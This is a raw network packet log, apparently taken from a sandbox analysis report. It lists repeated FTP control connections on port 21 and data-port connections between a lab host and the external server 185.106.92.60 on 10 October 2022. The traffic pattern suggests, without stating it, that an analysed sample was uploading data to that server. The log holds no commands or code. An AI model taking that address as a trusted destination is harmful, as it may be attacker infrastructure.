                                                                                                                                    Oct 10, 2022 06:02:28.458853960 CEST4975864538192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:28.481332064 CEST6453849758185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:28.481416941 CEST6453849758185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:28.481539011 CEST4975864538192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:28.483726025 CEST2149757185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:28.485759020 CEST4975721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:28.485888004 CEST4975721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:28.511969090 CEST2149757185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:28.512018919 CEST2149757185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:28.512170076 CEST4975721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:28.626449108 CEST4975921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:28.649347067 CEST2149759185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:28.649641991 CEST4975921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:28.675847054 CEST2149759185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:28.675992966 CEST4975921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:28.676048994 CEST2149759185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:28.676095963 CEST2149759185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:28.676143885 CEST4975921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:28.679039955 CEST4975921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:28.723756075 CEST4975921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:28.747049093 CEST2149759185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:28.747200966 CEST4975921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:28.882860899 CEST4975921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:28.906424046 CEST2149759185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:28.906708002 CEST4975921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:28.941957951 CEST4975921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:28.965467930 CEST2149759185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:28.965567112 CEST4975921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:28.965883017 CEST4975921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:28.989356995 CEST2149759185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:28.989450932 CEST4975921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:28.989785910 CEST4975921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:29.013032913 CEST2149759185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:29.013355017 CEST4975921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:29.036597967 CEST4975921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:29.060138941 CEST2149759185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:29.060264111 CEST4975921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:29.060503006 CEST4976064540192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:29.085447073 CEST6454049760185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:29.085566044 CEST4976064540192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:29.085874081 CEST4975921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:29.109637022 CEST2149759185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:29.109726906 CEST4975921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:29.146230936 CEST4976064540192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:29.169944048 CEST2149759185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:29.170027971 CEST4975921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:29.170145035 CEST4975921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:29.171783924 CEST6454049760185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:29.171819925 CEST6454049760185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:29.171895981 CEST4976064540192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:29.192948103 CEST2149759185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:29.192994118 CEST2149759185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:29.193104029 CEST4975921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:29.371761084 CEST4976121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:29.394679070 CEST2149761185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:29.394929886 CEST4976121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:29.421080112 CEST2149761185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:29.421235085 CEST2149761185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:29.421395063 CEST4976121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:29.421463966 CEST2149761185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:29.421518087 CEST4976121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:29.421518087 CEST4976121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:29.422960997 CEST4976121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:29.446134090 CEST2149761185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:29.446413040 CEST4976121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:29.477344036 CEST4976121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:29.500371933 CEST2149761185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:29.500565052 CEST4976121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:29.501437902 CEST4976121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:29.524068117 CEST2149761185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:29.524169922 CEST4976121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:29.530775070 CEST4976121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:29.578232050 CEST2149761185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:29.578494072 CEST4976121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:29.585611105 CEST4976121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:29.608407021 CEST2149761185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:29.608499050 CEST4976121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:29.609435081 CEST4976121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:29.632493019 CEST2149761185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:29.632711887 CEST4976121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:29.633126974 CEST4976264541192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:29.656733990 CEST6454149762185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:29.656946898 CEST4976264541192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:29.661701918 CEST4976121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:29.685189962 CEST2149761185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:29.685530901 CEST4976121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:30.168482065 CEST4976264541192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:30.194356918 CEST6454149762185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:30.194402933 CEST6454149762185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:30.194478989 CEST4976264541192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:30.194761038 CEST2149761185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:30.194915056 CEST4976121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:30.195228100 CEST4976121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:30.217706919 CEST2149761185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:30.217763901 CEST2149761185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:30.217899084 CEST4976121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:30.426399946 CEST4976321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:30.449311972 CEST2149763185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:30.449637890 CEST4976321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:30.475207090 CEST2149763185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:30.475265980 CEST2149763185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:30.475368977 CEST2149763185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:30.475444078 CEST4976321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:30.475811005 CEST4976321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:30.492580891 CEST4976321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:30.516453981 CEST2149763185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:30.516649961 CEST4976321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:30.529813051 CEST4976321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:30.552877903 CEST2149763185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:30.553030968 CEST4976321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:30.554917097 CEST4976321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:30.577776909 CEST2149763185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:30.577953100 CEST4976321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:30.582098007 CEST4976321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:30.605350018 CEST2149763185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:30.605592012 CEST4976321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:30.642442942 CEST4976321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:30.665505886 CEST2149763185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:30.665651083 CEST4976321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:30.778769016 CEST4976321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:30.802059889 CEST2149763185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:30.802357912 CEST4976321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:30.840501070 CEST4976464543192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:30.863775015 CEST6454349764185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:30.864006042 CEST4976464543192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:31.495666981 CEST4976321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:31.519145012 CEST2149763185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:31.519407988 CEST4976321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:31.553323030 CEST4976464543192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:31.576328993 CEST6454349764185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:31.576464891 CEST6454349764185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:31.576520920 CEST2149763185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:31.576561928 CEST4976464543192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:31.576666117 CEST4976321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:31.576904058 CEST4976321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:31.599407911 CEST2149763185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:31.599457026 CEST2149763185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:31.599756002 CEST4976321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:31.738742113 CEST4976521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:31.761390924 CEST2149765185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:31.761518955 CEST4976521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:31.787218094 CEST2149765185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:31.787261009 CEST2149765185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:31.787291050 CEST2149765185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:31.787316084 CEST4976521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:31.787331104 CEST4976521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:31.787348986 CEST4976521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:31.787549019 CEST4976521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:31.810152054 CEST2149765185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:31.810379982 CEST4976521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:31.811372042 CEST4976521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:31.834110022 CEST2149765185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:31.834198952 CEST4976521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:31.834397078 CEST4976521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:31.857028961 CEST2149765185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:31.857235909 CEST4976521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:31.858302116 CEST4976521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:31.881305933 CEST2149765185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:31.881398916 CEST4976521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:31.881895065 CEST4976521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:31.904555082 CEST2149765185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:31.904639006 CEST4976521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:31.905492067 CEST4976521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:31.928499937 CEST2149765185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:31.928596973 CEST4976521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:31.928801060 CEST4976664544192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:31.954415083 CEST6454449766185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:31.954541922 CEST4976664544192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:31.954828024 CEST4976521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:31.978929996 CEST2149765185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:31.979161978 CEST4976521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:31.979588032 CEST4976664544192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.003607988 CEST2149765185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:32.003686905 CEST6454449766185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:32.003736973 CEST6454449766185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:32.003756046 CEST4976521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.003868103 CEST4976664544192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.004024982 CEST4976521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.026526928 CEST2149765185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:32.026722908 CEST2149765185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:32.026779890 CEST4976521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.149779081 CEST4976721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.172554970 CEST2149767185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:32.172755003 CEST4976721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.199062109 CEST2149767185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:32.199110031 CEST2149767185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:32.199141979 CEST2149767185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:32.199244022 CEST4976721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.199244022 CEST4976721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.199244022 CEST4976721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.199481964 CEST4976721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.222172976 CEST2149767185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:32.226371050 CEST4976721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.226371050 CEST4976721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.249381065 CEST2149767185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:32.249506950 CEST4976721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.249649048 CEST4976721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.272532940 CEST2149767185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:32.272910118 CEST4976721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.273134947 CEST4976721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.296111107 CEST2149767185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:32.296422005 CEST4976721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.296896935 CEST4976721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.319521904 CEST2149767185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:32.319920063 CEST4976721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.322315931 CEST4976721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.345490932 CEST2149767185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:32.345675945 CEST4976721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.345794916 CEST4976864545192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.368788958 CEST6454549768185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:32.369056940 CEST4976864545192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.369599104 CEST4976721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.393385887 CEST2149767185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:32.393584013 CEST4976721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.394547939 CEST4976864545192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.417426109 CEST6454549768185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:32.417937994 CEST6454549768185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:32.418086052 CEST4976864545192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.418211937 CEST2149767185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:32.418315887 CEST4976721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.419907093 CEST4976721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.442420959 CEST2149767185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:32.442488909 CEST2149767185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:32.442744970 CEST4976721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.582850933 CEST4976921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.606029034 CEST2149769185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:32.607075930 CEST4976921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.638695002 CEST2149769185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:32.638740063 CEST2149769185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:32.638772011 CEST2149769185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:32.639028072 CEST4976921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.639554977 CEST4976921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.710424900 CEST2149769185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:32.710782051 CEST4976921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.711024046 CEST4976921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.734493017 CEST2149769185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:32.740325928 CEST4976921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.740672112 CEST4976921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.763777971 CEST2149769185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:32.766146898 CEST4976921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.775907040 CEST4976921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.799809933 CEST2149769185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:32.799949884 CEST4976921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.800522089 CEST4976921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.823554993 CEST2149769185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:32.824265003 CEST4976921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.825529099 CEST4976921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.849025011 CEST2149769185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:32.852204084 CEST4976921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.852741003 CEST4977064546192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.875279903 CEST6454649770185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:32.875451088 CEST4977064546192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.875776052 CEST4976921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.899382114 CEST2149769185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:32.899606943 CEST4976921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.900326967 CEST4977064546192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.922996044 CEST6454649770185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:32.923043966 CEST6454649770185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:32.923187971 CEST4977064546192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.923808098 CEST2149769185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:32.923938036 CEST4976921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.924113989 CEST4976921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:32.946911097 CEST2149769185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:32.947197914 CEST2149769185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:32.947421074 CEST4976921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.096736908 CEST4977121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.120584965 CEST2149771185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:33.123199940 CEST4977121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.151302099 CEST2149771185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:33.151351929 CEST2149771185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:33.151386023 CEST2149771185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:33.151570082 CEST4977121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.151570082 CEST4977121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.151937008 CEST4977121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.176651955 CEST2149771185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:33.180214882 CEST4977121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.186963081 CEST4977121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.211821079 CEST2149771185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:33.212039948 CEST4977121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.212419987 CEST4977121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.237184048 CEST2149771185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:33.237440109 CEST4977121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.237742901 CEST4977121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.263272047 CEST2149771185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:33.268167973 CEST4977121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.269151926 CEST4977121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.293469906 CEST2149771185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:33.294981956 CEST4977121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.296348095 CEST4977121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.321394920 CEST2149771185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:33.321618080 CEST4977121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.322031975 CEST4977264548192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.345139027 CEST6454849772185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:33.348437071 CEST4977264548192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.348794937 CEST4977121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.373284101 CEST2149771185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:33.374138117 CEST4977121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.376122952 CEST4977264548192.168.2.3185.106.92.60
